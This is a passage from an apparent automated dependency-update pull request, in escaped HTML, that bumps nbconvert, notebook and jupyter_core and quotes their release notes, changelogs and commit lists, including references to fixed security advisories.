viewable in \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.6.3...4.11.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nbconvert` from 5.6.1 to 6.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/nbconvert/releases\"\u003enbconvert's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease 6.5.1\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003e6.5.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop dependency on testpath. by \u003ca href=\"https://github.com/anntzer\"\u003e\u003ccode\u003e@​anntzer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1723\"\u003ejupyter/nbconvert#1723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdopt pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1744\"\u003ejupyter/nbconvert#1744\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd pytest settings and handle warnings by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1745\"\u003ejupyter/nbconvert#1745\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eApply Autoformatters by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1746\"\u003ejupyter/nbconvert#1746\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd git-blame-ignore-revs by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1748\"\u003ejupyter/nbconvert#1748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate flake8 config by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1749\"\u003ejupyter/nbconvert#1749\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esupport bleach 5, add packaging and tinycss2 dependencies by \u003ca href=\"https://github.com/bollwyvl\"\u003e\u003ccode\u003e@​bollwyvl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1755\"\u003ejupyter/nbconvert#1755\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1752\"\u003ejupyter/nbconvert#1752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate cli example by \u003ca href=\"https://github.com/leahecole\"\u003e\u003ccode\u003e@​leahecole\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1753\"\u003ejupyter/nbconvert#1753\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1757\"\u003ejupyter/nbconvert#1757\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up workflows by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1750\"\u003ejupyter/nbconvert#1750\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1752\"\u003ejupyter/nbconvert#1752\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/nbconvert/compare/6.4.5...6.5\"\u003ehttps://github.com/jupyter/nbconvert/compare/6.4.5...6.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e6.4.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd section to \u003ccode\u003ecustomizing\u003c/code\u003e showing how to use template inheritance by \u003ca href=\"https://github.com/stefanv\"\u003e\u003ccode\u003e@​stefanv\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1719\"\u003ejupyter/nbconvert#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove ipython genutils by \u003ca href=\"https://github.com/rgs258\"\u003e\u003ccode\u003e@​rgs258\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1727\"\u003ejupyter/nbconvert#1727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate changelog for 6.4.3 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1728\"\u003ejupyter/nbconvert#1728\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/stefanv\"\u003e\u003ccode\u003e@​stefanv\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1719\"\u003ejupyter/nbconvert#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rgs258\"\u003e\u003ccode\u003e@​rgs258\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1727\"\u003ejupyter/nbconvert#1727\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/nbconvert/compare/6.4.2...6.4.3\"\u003ehttps://github.com/jupyter/nbconvert/compare/6.4.2...6.4.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e6.4.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOptionally speed up validation by \u003ca href=\"https://github.com/gwincr11\"\u003e\u003ccode\u003e@​gwincr11\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1672\"\u003ejupyter/nbconvert#1672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdding missing div compared to JupyterLab DOM structure by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1678\"\u003ejupyter/nbconvert#1678\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow passing extra args to code highlighter by \u003ca href=\"https://github.com/yuvipanda\"\u003e\u003ccode\u003e@​yuvipanda\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1683\"\u003ejupyter/nbconvert#1683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent page breaks in outputs when printing by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1679\"\u003ejupyter/nbconvert#1679\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd collapsers to template by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1689\"\u003ejupyter/nbconvert#1689\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix recent pandoc latex tables by adding calc and array (\u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1536\"\u003e#1536\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1566\"\u003e#1566\u003c/a\u003e) by \u003ca href=\"https://github.com/cgevans\"\u003e\u003ccode\u003e@​cgevans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1686\"\u003ejupyter/nbconvert#1686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd an invalid notebook error by \u003ca href=\"https://github.com/gwincr11\"\u003e\u003ccode\u003e@​gwincr11\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1675\"\u003ejupyter/nbconvert#1675\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typos in execute.py by \u003ca href=\"https://github.com/TylerAnderson22\"\u003e\u003ccode\u003e@​TylerAnderson22\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1692\"\u003ejupyter/nbconvert#1692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eModernize latex greek math handling (partially fixes \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1673\"\u003e#1673\u003c/a\u003e) by \u003ca href=\"https://github.com/cgevans\"\u003e\u003ccode\u003e@​cgevans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1687\"\u003ejupyter/nbconvert#1687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix use of deprecated API and update test matrix by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1696\"\u003ejupyter/nbconvert#1696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate nbconvert_library.ipynb by \u003ca href=\"https://github.com/letterphile\"\u003e\u003ccode\u003e@​letterphile\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1695\"\u003ejupyter/nbconvert#1695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eChangelog for 6.4 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1697\"\u003ejupyter/nbconvert#1697\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/nbconvert/blob/main/CHANGELOG.md\"\u003enbconvert's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChanges in nbconvert\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e7.16.6\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/compare/v7.16.5...01c6ab25ec81277ab4d8585747f904c89a8c02b0\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePrevent leading whitespace in markdown code blocks from being stripped \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2203\"\u003e#2203\u003c/a\u003e (\u003ca href=\"https://github.com/peytondmurray\"\u003e\u003ccode\u003e@​peytondmurray\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix bullet list parsing in markdown \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2177\"\u003e#2177\u003c/a\u003e (\u003ca href=\"https://github.com/douglas-raillard-arm\"\u003e\u003ccode\u003e@​douglas-raillard-arm\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when running with optimization \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2160\"\u003e#2160\u003c/a\u003e (\u003ca href=\"https://github.com/QuLogic\"\u003e\u003ccode\u003e@​QuLogic\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove any twitter mention \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2206\"\u003e#2206\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate base.tex.j2 for macro compatibility with newer versions of Pandoc \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2196\"\u003e#2196\u003c/a\u003e (\u003ca href=\"https://github.com/PetalAdrift\"\u003e\u003ccode\u003e@​PetalAdrift\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/graphs/contributors?from=2025-01-02\u0026amp;to=2025-01-28\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3ACarreau+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Adouglas-raillard-arm+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​douglas-raillard-arm\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Agabemorris12+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​gabemorris12\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Akrassowski+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​krassowski\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3APetalAdrift+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​PetalAdrift\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Apeytondmurray+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​peytondmurray\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3AQuLogic+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​QuLogic\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e7.16.5\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/compare/v7.16.4...18e10f6484afdfee39105248c28abe5ef0835b22\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eEnhancements made\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for mistune 3.1.0 \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2199\"\u003e#2199\u003c/a\u003e (\u003ca href=\"https://github.com/fcollonval\"\u003e\u003ccode\u003e@​fcollonval\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllow including \u003ccode\u003etext/x-rst\u003c/code\u003e outputs in rst conversion, transition away from \u003ccode\u003etext/restructuredtext\u003c/code\u003e \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2167\"\u003e#2167\u003c/a\u003e (\u003ca href=\"https://github.com/takluyver\"\u003e\u003ccode\u003e@​takluyver\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDo not display mathjax overlay \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2181\"\u003e#2181\u003c/a\u003e (\u003ca href=\"https://github.com/timkpaine\"\u003e\u003ccode\u003e@​timkpaine\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWork around pip 24.1 bug which prevents installing pandocfilters 1.4.1 \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2168\"\u003e#2168\u003c/a\u003e (\u003ca href=\"https://github.com/takluyver\"\u003e\u003ccode\u003e@​takluyver\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't die if template path cannot be read \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2162\"\u003e#2162\u003c/a\u003e (\u003ca href=\"https://github.com/stuaxo\"\u003e\u003ccode\u003e@​stuaxo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix markdown2asciidoc function for pandoc \u0026gt;= 3.0 (closes \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/2017\"\u003e#2017\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2152\"\u003e#2152\u003c/a\u003e (\u003ca href=\"https://github.com/thomasjm\"\u003e\u003ccode\u003e@​thomasjm\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eenhancement dep-chain: directly depend on bleach[css], instead of pulling in tinycss2. \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2166\"\u003e#2166\u003c/a\u003e (\u003ca href=\"https://github.com/xiacunshun\"\u003e\u003ccode\u003e@​xiacunshun\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: update pre-commit hooks \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2146\"\u003e#2146\u003c/a\u003e (\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/7471b75a506b2fec776613e50e4f2234b97f3c8e\"\u003e\u003ccode\u003e7471b75\u003c/code\u003e\u003c/a\u003e Release 6.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/c1943e0e9fd0ad6abd7d8dae380474cca4b04a31\"\u003e\u003ccode\u003ec1943e0\u003c/code\u003e\u003c/a\u003e Fix pre-commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/8685e9378086e8d82a0df92505fe386095f929ad\"\u003e\u003ccode\u003e8685e93\u003c/code\u003e\u003c/a\u003e Fix tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/0abf2906bc6c7170c8d70bc0df6995d21c5aeaf1\"\u003e\u003ccode\u003e0abf290\u003c/code\u003e\u003c/a\u003e Run black and prettier\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/418d545ae596d95f5ea82d141c68fd1abc99f1a6\"\u003e\u003ccode\u003e418d545\u003c/code\u003e\u003c/a\u003e Run test on 6.x branch\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/bef65d7ab2a469b01e4aa25f44c0f20326f7c7c5\"\u003e\u003ccode\u003ebef65d7\u003c/code\u003e\u003c/a\u003e Convert input to string prior to escape HTML\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/0818628718c4a5d3ddd671fbd4881bf176e7d6e2\"\u003e\u003ccode\u003e0818628\u003c/code\u003e\u003c/a\u003e Check input type before escaping\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/b206470f9ecd71b006a37dd1298dd3d9e3dd46dd\"\u003e\u003ccode\u003eb206470\u003c/code\u003e\u003c/a\u003e GHSL-2021-1017, GHSL-2021-1020, GHSL-2021-1021\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/a03cbb8a8d04d47aefec51e7b1b816045682aed5\"\u003e\u003ccode\u003ea03cbb8\u003c/code\u003e\u003c/a\u003e GHSL-2021-1026, GHSL-2021-1025\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/48fe71eb3335caf4e03166e56e0d16efcfbeaf44\"\u003e\u003ccode\u003e48fe71e\u003c/code\u003e\u003c/a\u003e GHSL-2021-1024\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jupyter/nbconvert/compare/5.6.1...6.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `notebook` from 6.0.3 to 6.4.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/notebook/releases\"\u003enotebook's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.4.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddress security advisory \u003ca href=\"https://github.com/jupyter/notebook/security/advisories/GHSA-v7vq-3x77-87vg\"\u003eGHSA-v7vq-3x77-87vg\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/notebook/compare/v6.4.11...6.4.12\"\u003ehttps://github.com/jupyter/notebook/compare/v6.4.11...6.4.12\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.11\u003c/h2\u003e\n\u003ch2\u003e6.4.11\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/compare/6.4.10...3911672959fcd35cf4a1b1ad7c9c8a5651c17ae6\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate further to ipykernel comm refactoring \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6358\"\u003e#6358\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd testpath to the test dependencies. \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6357\"\u003e#6357\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTemporary workaround to fix js-tests related to sanitizer js loading by phantomjs \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6356\"\u003e#6356\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse place-hold.it instead of plaecehold.it to create image placeholders \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6320\"\u003e#6320\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMigrate to python 3.7+ \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6260\"\u003e#6260\u003c/a\u003e - Fixes \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6256\"\u003e#6256\u003c/a\u003e (\u003ca href=\"https://github.com/penguinolog\"\u003e\u003ccode\u003e@​penguinolog\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/graphs/contributors?from=2022-03-15\u0026amp;to=2022-04-18\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Ablink1073+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Aecharles+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Afcollonval+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​fcollonval\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Agithub-actions+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Ajtpio+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​jtpio\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3Apenguinolog+updated%3A2022-03-15..2022-04-18\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​penguinolog\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.8\u003c/h2\u003e\n\u003ch2\u003e6.4.8\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/compare/v6.4.7...479902d83a691253e0cff8439a33577e82408317\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix to remove potential memory leak on Jupyter Notebooks ZMQChannelHandler code \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6251\"\u003e#6251\u003c/a\u003e (\u003ca href=\"https://github.com/Vishwajeet0510\"\u003e\u003ccode\u003e@​Vishwajeet0510\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/graphs/contributors?from=2022-01-12\u0026amp;to=2022-01-25\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnotebook+involves%3AVishwajeet0510+updated%3A2022-01-12..2022-01-25\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​Vishwajeet0510\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca 